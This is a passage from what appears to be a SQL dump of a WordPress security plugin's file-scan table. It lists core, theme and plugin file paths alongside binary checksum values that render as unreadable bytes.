\0\0\0\0\0','^q�����Ͽ4g�<P','p#A��`u%;q[��O�!�!��N�#00�^�t','',0,'?'),('.�F�B��T���','wp-content/themes/hueman/option-tree/languages/option-tree-et.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���΄(\r�>��\\[J','a�O��\"���5qi��}2�ețj����','',0,'?'),('.����E��.�&���a','wp-content/themes/alpha-store/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6{w�\Z;�Q�^�%]�','��K����8��St��I�#r�4#9��W�','',0,'?'),('.���5�2�e�\'D�','wp-content/themes/verbosa/templates/template-twocolumns-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�\0�VY�~�','Ɏ�����t�\'4N�\"��1��s錠��L��','',0,'?'),('/�Hp���hzZ[','wp-content/themes/hueman/option-tree/assets/images/layout/left-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;��\06:�����g\0','��. Wm���m~�t��GAe�6�nWz�Yc�','',0,'?'),('/!�:�`[���I�','wp-content/themes/sg-window/img/icons/small/tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C%h{j�3�/=�v�','M��_�y)�c\ZGh�r�x��\"�P;�X���f','',0,'?'),('/(�r!]L5�g��l�;','wp-content/themes/mh-magazine-lite/languages/he_IL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_�S.���Ӝ�7','�,����]j렵r`��@��vt�{�NP���','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��l��u�W��_K','ւyKSY�,Cm&^�	E�5HB/5ǟ��!&�5','',0,'?'),('/-h�d�tK�f05��i','wp-content/plugins/login-lockdown/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�	{t�;-�S<','1#4�4��v��!��$8Pl@��8Z��g*�L�','',0,'?'),('/1�H���.��UfA4','wp-content/plugins/wordpress-seo/js/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('/J����\\��}��3','wp-content/themes/fluida/cryout/css/jquery-ui.structure.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ebv@���D�~','�Jnl�~Qh���/�K���#?o�|�[C��','',0,'?'),('/L:4�n��c��>','wp-content/themes/illdy/layout/css/main.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�x��:<�\n3^�$�','� ~M��,�\0�?��������迭��\r:�','',0,'?'),('/NLg�:�+��-gJ��O','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/config.php',0,'��&>$ ������<K','��&>$ ������<K','f|�UX\0&�ED&{�H��� ��`���A��','',0,'?'),('/aTVG�dX�<fC.�2','wp-content/themes/nirvana/fonts/yanonekaffeesatz-regular-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���%�뜷3���?','Tu���nO�4Ssӭ]�Eu@ �³�!','',0,'?'),('/e��.�L1�fEX��4�','wp-content/themes/barletta/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('/f����Ǒ�T�cB','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-video/config.php',0,'rCsJ�RvL>����','rCsJ�RvL>����','�|ߦNzg����L��p��`��uʖ�','',0,'?'),('/|A�~�.\n%�j��w','wp-content/themes/verbosa/cryout/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�!08���\"��;','��� ���BW����.��7K�!�	�[[�','',0,'?'),('/|����\r>���a���T','wp-content/themes/sg-window/inc/widget-sidebar-navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��޼Eޤ��n^l`','s���\r���\\Oj��{��O#�rd��j�','',0,'?'),('/�=�aIƀ)R�)','wp-content/plugins/spam-captcha/core/img/star.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�DT9��J�iT�7�','���܁%|o�ʮo3����d��l݈�s9','',0,'?'),('/�Z��^���/�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.domaindiscover.php',0,'�X�Y��\'�Tfz�i','�X�Y��\'�Tfz�i','��9c�n}�cc��x�w��6Ί�U\Z�킯a�W','',0,'?'),('/���[��ؤ��x�bo','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/servmask.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�����gZ�1�cF','�HƢo���\Z/\'_34��ؘ\rXD,�k%�:p','',0,'?'),('/�n�Na�L�nU��','wp-content/themes/vega/parts/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ó��$�-1���2','�f��X1����K�0\r@d�֦�/�<��','',0,'?'),('/�D�c��l��ޏ�','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_65_ffffff_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ŽP�uv�����$c','b��4\"��,�Ŗ����2�DvC�X�\0','',0,'?'),('/�+�\0l�5~�c��','wp-content/themes/travelify/library/font/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�۝c�1��ח�d��','',0,'?'),('/�*��~V���ΰ�f�','wp-content/themes/hueman/assets/front/img/demo/7-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�g�S�ހRJ�[}o','\nd���I1w�]N=���s0��Ur.����(ggC�','',0,'?'),('/��[��*A���n��','wp-content/themes/hueman/functions/czr/tmpl/inputs/text_editor-input-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Y[?��C%au�j�+8','=|:z�Ԩ��GH�S��v�jG�&+%J��p�','',0,'?'),('/�%*=e�B�AuW!}s','wp-content/themes/sg-window/inc/widget-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�=�&	���%;���','K�Y�����~*������e,\'��2���','',0,'?'),('/��Ξ0��߷.G*#','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.utils.php',0,'O�ƒ;S��?��H�Ih�','O�ƒ;S��?��H�Ih�','��\Zж��nj���\0�8�_V���\"��i��','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('/��M�n�����(�sv','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/No�\'�n�v��9�,�','�J�P\"Aұ\r�S�P4In\Z*�0A\'�ϫ��p�/]','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/�s����NF�>�6�','wp-content/plugins/contact-form-7/includes/css/styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q]K��IHG�y&L=9�','7����H����Ih�\Z3,��H��B_-���i\0*','',0,'?'),('/���X�r��K�cR�','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-active-callbacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','玀#��޳��NtIs','�zS9?,l�(�i\n�o�x���7�#��BR?UK��','',0,'?'),('/�7���[���n��','wp-content/themes/twentyseventeen/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LtW4����b$��','=\r��\\�Zq�ѯ�M���w�@m��\'�xJ','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��P��>g*��g��d','wp-content/themes/accelerate/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B^��X;��lV;޺P�','Һ�U����;E���\'C��P�u�U���\\�)�','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/��Ǩ$A�P����','wp-content/themes/barletta/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�̨�!�[�ᅲ|[','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('/�gWWC�W�wz��<�','wp-content/themes/hueman/functions/czr/class-czr-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5D`C0Xp��ݮE�|J','\nb�s�\rd_ �W���]kn.c�˹ٹ�S�N�','',0,'?'),('08]�\">��','wp-content/plugins/unyson/framework/includes/option-types/date-picker/class-fw-option-type-wp-date-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z���Q�,��҃4','��n	�C��Ifn�5��gE�����l�# �','',0,'?'),('0բ�N����','wp-content/themes/nirvana/languages/ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��m�zO�|]N�:�','8��)x��\0��z\0U=�G�A{ۦIW�Ҋ�6i','',0,'?'),('0;t(����\ZX���k�','wp-content/themes/illdy/layout/js/plugins.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A}o�x��CpKC�','b]9�dx���MV�\'�`�E-Ce!�p&�/��','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0<�9���u�;SZ\rj','wp-content/themes/twentytwentyone/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���e�h�\n��i','�����t5ܶn�!��ENӗ=[p\rd|L�v���','',0,'?'),('0<����@�I�օ�','wp-content/themes/fabulous-fluid/inc/structure.php',0,'��k_��7m�u��','��k_��7m�u��','�w�i�z���-���mBy�W�N4S�����','',0,'?'),('0Q�}up��\'{�\Z�','wp-content/themes/nirvana/admin/images/colorschemes-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�Ӻ�{���O�{��','�nbT��Ϸք�m�_��3�\n���ä�','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0n-V|\\,����=�iu�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/static/js/jquery.carouFredSel-6.2.1-packed.js',0,'�j���sf����A:l�','�j���sf����A:l�','�;���,^\n<��ĈA\"��Ij\"+�׸�;G�N','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lhoOs�M,��[	y�','!+d��?i��pT|�w+�Y���H}�d��x','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),('0�ga/A�+8�/zm�','wp-content/themes/lightly/js/vendor/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('0�$��:�$qc��>\'','wp-content/themes/mh-magazine-lite/js/css3-mediaqueries.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ӕ�o�Y�SJ�','{��-﵁<6$A\"Z���e��H���Խ�F','',0,'?'),('0����3��B^�','wp-content/themes/sg-window/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u�2�=	Ȩ�,�','�#��DOi�Bx�O4�<��G>������j٤�$','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0��ݽ(��!��d�v','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.pt.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�p�gL&Z�� _Œ','2%��+s7x��HY�ifO���\0됮��`W{�r','',0,'?'),('0���(��pd6�p�','wp-content/themes/clean-magazine/js/jquery.sidr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cϱx�������!�S','Tߖ�#��3�f5E��MrB�\'rSw�m���0','',0,'?'),('0���&���M��Ue2j','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_75_dadada_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�$�2���H8�T^','R�@���%L��2m������f�&��<�','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',0,'�r��ܻz�/��$c�ܱ','�r��ܻz�/��$c�ܱ','���DM��\"������J�L:���f��W�>\Z�','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('13�i�!�xWˣୃ+','wp-content/themes/sg-window/publication/template-parts/content-page.php',0,'I2��S�V@pڈbO+S�','I2��S�V@pڈbO+S�','�^UV��^�EGw2r����poi\Z�L�\0�:','',0,'?'),('1=�AK7y@<�R��','wp-content/plugins/unyson/framework/helpers/class-fw-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gi6\r��07q��A~���','\n���)}y�p�E�����j�2�3~�g\rtm���','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��a2P���KQ��i\"','����F�;L��_����-������-��N��x','',0,'?'),('1@�q���x��׊q�U�','wp-content/themes/clean-magazine/inc/clean-magazine-social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|1��D�~q\'�','�.oq�X����5%;�iO!��w�I@�8�1�S','',0,'?'),('1A����,\ns����v','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��)��ɾNS(�! 4Z','��/�[��f	�nU���!79�8^94����M','',0,'?'),('1U|h�%����|���','wp-content/themes/hueman/parts/featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���h`�I�0J��5','��O6m6Dk[=�{	=�.�\Z_���	�\"~S','',0,'?'),('1VCl]���;�����','wp-content/themes/nirvana/content/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������w\"8�',':�Ʊ�*��=M�َ�7��f�d����!�','',0,'?'),('1^��BsCZU*��M�>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o�-�6��ѥ�p|','���dd�^�#QҒ\Z�#q�^�Ɠ�J�w�','',0,'?'),('1c����@��R�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/options.php',0,' �Y\ZhЧ]��,',' �Y\ZhЧ]��,','�onYI\\��뽍��ܨ�t���7�m�Uv','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~݋','',0,'?'),('1v��캵3�3�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_grid.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�p��G�&�H �','��u-�T�к���*]Fa���K�`�*�U \'��F','',0,'?'),('1zw��I0�W�U.c��','wp-content/themes/nirvana/fonts/ubuntu-b-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���\0���R��f~','���x�yli\0�A}�eǴ�J��n��\n�PrT ','',0,'?'),('1�3\r\rI��W��\\��','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_J�ex��	V-\r','�߬a�#�1Ȫ���s�9��;�\0e�oH߉T��','',0,'?'),('1�Fb3}�!Q[�dۗ','wp-content/themes/twentyseventeen/template-parts/post/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&h`6K��¤\Z','�����P�_}�*5�6C�	�3���M,���','',0,'?'),('1���c(I3\r}�u�E�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/class-api-google-client.php',0,'�v|d����DhP��J��','�v|d����DhP��J��','��U�!:�����.�pA���Z��4m&F:2!','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��-J�~xY~T.�a','��)�7uc��`W���������V�Jo�','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('1�d/C�\'������F�','wp-content/themes/fabulous-fluid/images/grid-img8.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��|�oh�j�ҥ�J','�u���r�.�ᯋȵ�a甉@q��=���H�','',0,'?'),('1�ه�җ\"R���\"','wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�HO�N��Z,�L��T',',_��ּ �����+%��$G\rK��?�����','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m�	\'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('1�W2`9��ʕ\0�a','wp-content/themes/hueman/assets/front/js/lib/jquery.jplayer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J3.��H���E�UW	D�','�I~�ZC�@��>��c\Z|;^,�mm�ʗY_�','',0,'?'),('1�z诔\n�\n�R����','wp-content/plugins/spam-captcha/core/lang/SL_framework-in_ID.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�{*5��H�kN�!rI','�8B�Dp��|�\\Gp��xB��g��2�V��&�','',0,'?'),('2Z�v��p$x�@V�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php',0,'\ZXIKh�?i��f�b','\ZXIKh�?i��f�b','�X��z�;�BfP��f3�^i�hN}�� ����','',0,'?'),('2	�ӵgi;����,��','wp-content/themes/panoramic/upgrade/library/images/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<͙{��`	s���','�\0B��D��\n7�ef�\'�HʢE��.��ִ','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6M���j���\n��','��s��g�����>�Z���&ϊ\r<�u9','',0,'?'),('2o���f:��&@�Xm','wp-content/themes/accelerate/content-blog-small-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S!����i��&�V�_','m�s��T��Eڬ���Ⱥ؁�!|w�\r�\"�:r','',0,'?'),('2��\n���h��K,t�P','wp-content/themes/wen-business/third-party/cycle2/js/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?8��Wt�nM�g�	O9z','l��4���`*��|t�\0�����9JX7���','',0,'?'),('2�,�c:K�de�i','wp-content/plugins/unyson/framework/extensions/update/class-fw-extension-update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=g>��^c�o[�-@kL','(|u�;z7GW]���\ZbKkߍa_���*eY�','',0,'?'),('2%~��`�y1����','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/static.php',0,'b��Hvo���I�� �','b��Hvo���I�� �','+�����+m�sQܔ~����92��\'&��r%�hf','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('2$�~��n��\'��X���','wp-content/plugins/contact-form-7-designer/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��55n>�\r���}','����|��$����Q\\�bH��1�ɼT]���','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�G��{����>','X�����g����k�3T���A L�M�v�U','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tP\rK6/�ۀ=*���	','�$gc�.%�e\Zd����!y��z�r\0*|Ě*�','',0,'?'),('2L��������q�','wp-content/themes/aqueduct/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�M�-���ƅH','���	��88z��4�bb<�$�m,�f��<','',0,'?'),('2O�P��m�4�L��u','wp-content/themes/sg-window/inc/widget-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�cW�5��_��8	7','�����s |7m�R��љ��o�yO��R6��}','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"s�V��,8�?��B','(}m7	H�\nv�E�.�-}�.�B.`yA��*]O','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]K4��,-v��;G@�','��/j}�<�\"w��+nlZ�Ȼ֛�e�X\rn�JFF�','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2��g!�[����\Z��','wp-content/themes/mh-magazine-lite/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\0�AO�[nrd?�Oi','D��d8�%@�3�:m����x�:�bz��)o','',0,'?'),('2����6�Cm Y~��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_nav-divider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0�à;�F�','��4����]�R�����7�����J�?��','',0,'?'),('2�|�΢(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ձ�����W�!5�Cz�','����dXJ��\n�W�n)�\"D�x��q{\'���{�L','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2�3���n�-cciٻ�','wp-content/plugins/unyson/framework/extensions/shortcodes/static/js/aggressive-coder.js',0,'��!s���o#�����','��!s���o#�����','�;_�������(H{�],��K\"z(=�','',0,'?'),('2�=ה�p͵�$5A�!','wp-content/plugins/unyson/framework/includes/option-types/switch/static/adaptive-switch/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r����ASA}0���','��æ+���e`hDj�K�\'��1����]Vx�M','',0,'?'),('2̝�!H��3ZY��ye','wp-content/themes/mh-magazine-lite/admin/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V����x����_',' \0�4�2oD�U!*\'��*sI��\ZI�0��H','',0,'?'),('2ч�jP�qU�ӌ��','wp-content/plugins/unyson/framework/helpers/class-fw-wp-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C8��w9u���y','KTA��U��_u֖\"�寱\\�_D�u8t+�B��$u','',0,'?'),('2�u\n�kK�؞�&�','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/js/render-icon-previews.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�ݍ�~�n[�zM','4]f�]�w��.�M��N_c�\na��Mڄz','',0,'?'),('2��{��8d�%�_�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_reset-text.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ƈ}o���\Z�@4','`.G�k�ī4��:�M�8/\"w�B}�`���','',0,'?'),('2�xfJL�\0J���=l0�','wp-content/themes/wen-business/third-party/mmenu/css/jquery.mmenu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[wv�8��k?�.ǃ\\','�,}��?�\0-��r�S~J�.�?.�%�n�I','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڍ��$�����vDyG',')ӂ-��wʵT��m��q�lz8=��jI�y�','',0,'?'),('2����{Od�V6�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/export-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L{z�I�?��>u��','���GvB\"v��e܏��Y~�dž����C~�','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f��u���ן)','���Vb�p�O+	�N$�uw���}�h�\"�','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('3��J��c$�\Z+','wp-content/plugins/wordfence/js/date.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('3	